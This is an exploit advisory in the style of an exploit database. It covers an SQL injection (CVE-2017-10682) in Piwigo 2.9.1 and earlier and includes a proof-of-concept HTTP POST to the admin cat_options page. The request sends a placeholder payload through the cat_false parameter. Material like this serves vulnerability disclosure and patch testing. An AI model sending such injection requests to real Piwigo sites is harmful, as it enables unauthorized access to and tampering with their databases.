# # # # #
# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection
# Dork: N/A
# Date: 12.12.2017
# Vendor Homepage: http://piwigo.org/
# Software Link: http://piwigo.org/basics/downloads
# Version: <= 2.9.1
# Category: Webapps
# Tested on: WiN7_x64/WIN10_X64
# CVE: CVE-2017-10682
# # # # #
# Exploit Author: Akityo
# Email: akityo@foxmail.com
# # # # #
# Description:
#
# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter
# in the comments or status page to cat_options.php.
#
#
# # # # #
# Proof-of-Concent:
#
# POST /[path]/admin.php?page=cat_options§ion=status HTTP/1.1
# Host: www.test.com
# Content-Length: 34
# Cache-Control: max-age=0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
# Content-Type: application/x-www-form-urlencoded
# Accept-Encoding: gzip, deflate
# Accept-Language: zh-CN,zh;q=0.8
# Cookie: null
# Connection: close
#
# cat_false%5B%5D=[payload here]&trueify=%C2%AB
#
#
# # # # #